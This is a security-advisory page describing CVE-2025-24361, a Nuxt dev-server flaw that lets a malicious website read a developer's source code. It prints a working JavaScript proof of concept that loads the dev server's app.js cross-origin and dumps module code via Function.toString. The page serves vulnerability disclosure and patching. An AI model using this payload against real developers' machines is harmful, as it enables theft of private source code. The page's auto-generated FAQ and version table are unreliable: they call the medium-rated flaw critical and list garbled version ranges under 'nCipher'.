medium
5.3
CWE
749
EPSS
0.043%
Advisory Published
Advisory Published
Updated

CVE-2025-24361: Opening a malicious website while running a Nuxt dev server could allow read-only access to code

First published: Sat Jan 25 2025(Updated: )

### Summary Source code may be stolen during dev when using webpack / rspack builder and you open a malicious web site. ### Details Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject `<script src="http://localhost:3000/_nuxt/app.js">` in their site and run the script. By using `Function::toString` against the values in `window.webpackChunknuxt_app`, the attacker can get the source code. ### PoC 1. Create a nuxt project with webpack / rspack builder. 1. Run `npm run dev` 1. Open `http://localhost:3000` 1. Run the script below in a web site that has a different origin. 1. You can see the source code output in the document and the devtools console. ```js const script = document.createElement('script') script.src = 'http://localhost:3000/_nuxt/app.js' script.addEventListener('load', () => { for (const page in window.webpackChunknuxt_app) { const moduleList = window.webpackChunknuxt_app[page][1] console.log(moduleList) for (const key in moduleList) { const p = document.createElement('p') const title = document.createElement('strong') title.textContent = key const code = document.createElement('code') code.textContent = moduleList[key].toString() p.append(title, ':', document.createElement('br'), code) document.body.appendChild(p) } } }) document.head.appendChild(script) ``` ![image](https://github.com/user-attachments/assets/201e39b7-da5c-4359-867f-96c9adfd3c85) It contains the compiled source code and also the source map (but it seems the sourcemap contains transformed content in the `sourcesContent` field). ### Impact Users using webpack / rspack builder may get the source code stolen by malicious websites.

Credit: security-advisories@github.com security-advisories@github.com

Affected SoftwareAffected VersionHow to fix
npm/@nuxt/rspack-builder>=3.12.2<3.15.3
3.15.3
npm/@nuxt/webpack-builder>=3.0.0<3.15.3
3.15.3
nCipher>=3.0.0<=3.15.12
nCipher>=3.12.2<3.152

Never miss a vulnerability like this again

Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.

Read MoreStart Free Trial

Reference Links

Frequently Asked Questions

  • What is the severity of CVE-2025-24361?

    CVE-2025-24361 is considered a critical vulnerability due to the potential for source code theft through malicious websites.

  • How do I fix CVE-2025-24361?

    To fix CVE-2025-24361, update your Nuxt application to version 3.15.3 or later for both @nuxt/rspack-builder and @nuxt/webpack-builder.

  • Which versions of Nuxt are affected by CVE-2025-24361?

    Nuxt versions ranging from 3.0.0 to 3.15.12 and 3.12.2 to below 3.152 are affected by CVE-2025-24361.

  • What is the attack vector for CVE-2025-24361?

    The attack vector for CVE-2025-24361 involves an attacker injecting malicious scripts through the use of classic script tags that bypass the same origin policy.

  • Is CVE-2025-24361 a client-side or server-side vulnerability?

    CVE-2025-24361 is primarily a client-side vulnerability that can lead to unauthorized access to sensitive source code.

Company

Resources

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2025 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203